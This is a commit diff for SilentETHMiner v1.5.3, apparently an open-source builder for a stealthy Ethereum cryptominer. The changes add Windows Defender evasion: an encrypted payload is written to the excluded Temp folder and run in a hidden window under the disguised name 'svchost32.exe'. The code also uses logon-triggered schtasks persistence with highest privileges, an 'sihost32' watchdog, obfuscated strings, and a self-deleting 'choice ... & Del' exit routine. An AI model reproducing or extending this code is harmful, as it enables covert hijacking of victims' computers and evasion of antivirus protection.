Updated to v1.5.3

* Greatly reduced Windows Defender detections when "Bypass Windows Defender" is enabled by replacing Assembly.Load with simply writing the payload to Temp and executing it since the folders are excluded
* Fixed the paths for systems that have custom lowercase characters like Turkish

Author: UnamSanctam

README.md

@@ -1,7 +1,7 @@
 
 <img src="https://github.com/UnamSanctam/SilentETHMiner/blob/master/SilentETHMiner.png?raw=true">
 
-# SilentETHMiner v1.5.2 - Based on Lime Miner v0.3
+# SilentETHMiner v1.5.3 - Based on Lime Miner v0.3
 
 
 ## Main Features
@@ -49,6 +49,9 @@ So the requirements are as follow:
 
 ## Changes
 
+### v1.5.3 (19/07/2021)
+* Greatly reduced Windows Defender detections when "Bypass Windows Defender" is enabled by replacing Assembly.Load with simply writing the payload to Temp and executing it since the folders are excluded
+* Fixed the paths for systems that have custom lowercase characters like Turkish
 ### v1.5.2 (14/07/2021)
 * Remade watchdog to reduce detections
 * Obfuscated more strings to reduce new Windows Defender detections

SilentETHMiner/Codedom.vb

@@ -301,6 +301,7 @@ Public Class Codedom
         stringb.Replace("#WATCHDOG", F.EncryptString("sihost32"))
         stringb.Replace("#TASKSCH", F.EncryptString("/c schtasks /create /f /sc onlogon /rl highest /tn "))
         stringb.Replace("#MINERID", F.EncryptString("--cinit-find-e"))
+        stringb.Replace("#DROPFILE", F.EncryptString("svchost32.exe"))
         stringb.Replace("#InjectionTarget", F.EncryptString(F.InjectionTarget(0)))
         stringb.Replace("#InjectionDir", F.InjectionTarget(1).Replace("(", "").Replace(")", "").Replace("%WINDIR%", """ + Environment.GetFolderPath(Environment.SpecialFolder.Windows) + """))
 
@@ -319,6 +320,7 @@ Public Class Codedom
         stringb.Replace("RLoader", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("RUninstaller", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("RProgram", F.Randomi(F.rand.Next(5, 40)))
+        stringb.Replace("RExit", F.Randomi(F.rand.Next(5, 40)))
 
         stringb.Replace("rarg1", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("rarg2", F.Randomi(F.rand.Next(5, 40)))

SilentETHMiner/Form1.Designer.vb

@@ -63,7 +63,20 @@ public static void Main()
 
         try
         {
+#if DefKillWD
+            string fn = Path.Combine(Path.GetTempPath(), Encoding.ASCII.GetString(RAES_Method(Convert.FromBase64String("#DROPFILE"))));
+            File.WriteAllBytes(fn, RAES_Method((byte[])new ResourceManager("#LoaderRes", Assembly.GetExecutingAssembly()).GetObject("#Program")));
+            Process.Start(new ProcessStartInfo
+            {
+                FileName = "cmd",
+                Arguments = "/c " + fn + " \"" + Assembly.GetEntryAssembly().Location + "\"",
+                WorkingDirectory = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
+                WindowStyle = ProcessWindowStyle.Hidden,
+                CreateNoWindow = true,
+            });
+#else
             Assembly.Load(RAES_Method((byte[])new ResourceManager("#LoaderRes", Assembly.GetExecutingAssembly()).GetObject("#Program"))).EntryPoint.Invoke(null, new object[0]);
+#endif
         }
         catch (Exception ex)
         {

SilentETHMiner/Resources/Loader.cs

@@ -28,12 +28,17 @@
 public partial class RProgram
 {
 #if DefSystem32
-    public static string rbD = ((new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)) + @"\" + RGetString("#LIBSPATH")).ToLower();
+    public static string rbD = ((new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)) + @"\" + RGetString("#LIBSPATH"));
 #else
-    public static string rbD = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH")).ToLower();
+    public static string rbD = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH"));
 #endif
 #if DefInstall
-    public static string rplp = (PayloadPath).ToLower();
+    public static string rplp = PayloadPath;
+#endif
+#if DefKillWD
+    public static string cmdl = Environment.GetCommandLineArgs()[1];
+#else
+    public static string cmdl = Assembly.GetEntryAssembly().Location;
 #endif
 
     public static void Main()
@@ -67,7 +72,7 @@ public static void Main()
 #endif
         }
 
-        if (Assembly.GetEntryAssembly().Location.ToLower() != rplp)
+        if (cmdl.ToLower() != rplp.ToLower())
         {
             foreach (Process proc in Process.GetProcessesByName(RGetString("#WATCHDOG")))
             {
@@ -79,7 +84,7 @@ public static void Main()
                 File.Delete(Path.Combine(rbD, RGetString("#WATCHDOG") + ".log"));
             } catch(Exception ex) {}
             Directory.CreateDirectory(Path.GetDirectoryName(rplp));
-            File.Copy(Assembly.GetEntryAssembly().Location.ToLower(), rplp, true);
+            File.Copy(cmdl, rplp, true);
             Thread.Sleep(2 * 1000);
             Process.Start(new ProcessStartInfo
             {
@@ -88,7 +93,7 @@ public static void Main()
                 WindowStyle = ProcessWindowStyle.Hidden,
                 CreateNoWindow = true,
             });
-            Environment.Exit(0);
+            RExit();
         }
 #endif
 
@@ -133,7 +138,7 @@ public static void Main()
             {
                 if (MemObj != null && MemObj["CommandLine"] != null && MemObj["CommandLine"].ToString().Contains(RGetString("#MINERID")))
                 {
-                    Environment.Exit(0);
+                    RExit();
                 }
             }
 
@@ -220,6 +225,7 @@ public static void Main()
             MessageBox.Show("M6: " + Environment.NewLine + ex.ToString());
 #endif
         }
+        RExit();
     }
 
     public static byte[] RGetTheResource(string rarg1)
@@ -233,6 +239,20 @@ public static string RGetString(string rarg1)
         return Encoding.ASCII.GetString(RAES_Method(Convert.FromBase64String(rarg1)));
     }
 
+    public static void RExit()
+    {
+#if DefKillWD
+        Process.Start(new ProcessStartInfo()
+        {
+            FileName = "cmd",
+            Arguments = "/C choice /C Y /N /D Y /T 3 & Del \"" + Assembly.GetEntryAssembly().Location + "\"",
+            WindowStyle = ProcessWindowStyle.Hidden,
+            CreateNoWindow = true
+        });
+#endif
+        Environment.Exit(0);
+    }
+
     public static byte[] RAES_Method(byte[] rarg1, bool rarg2 = false)
     {
         var rarg4 = new Rfc2898DeriveBytes("#KEY", Encoding.ASCII.GetBytes("#SALT"), 100);

SilentETHMiner/Resources/Program.cs

@@ -19,9 +19,9 @@
 
 public partial class RUninstaller
 {
-    public static string rbD = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH")).ToLower();
+    public static string rbD = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH"));
 #if DefSystem32
-    public static string rbD2 = (Environment.SystemDirectory + @"\" + RGetString("#LIBSPATH")).ToLower();
+    public static string rbD2 = (Environment.SystemDirectory + @"\" + RGetString("#LIBSPATH"));
 #endif
 
     public static void Main()
@@ -47,7 +47,7 @@ public static void Main()
             {
                 if (key != null)
                 {
-                    key.DeleteValue(Path.GetFileName(PayloadPath).ToLower());
+                    key.DeleteValue(Path.GetFileName(PayloadPath));
                 }
             }
         }
@@ -117,7 +117,7 @@ public static void Main()
             Directory.Delete(rbD2, true);
 #endif
 #if DefInstall
-            File.Delete((PayloadPath).ToLower());
+            File.Delete(PayloadPath);
 #endif
         }
         catch (Exception ex)

SilentETHMiner/Resources/Uninstaller.cs

@@ -24,7 +24,7 @@ public partial class RProgram
 {
     public static byte[] rxM = {};
     public static int rcheckcount = 0;
-    public static string rplp = (PayloadPath).ToLower();
+    public static string rplp = PayloadPath;
 
     public static void Main()
     {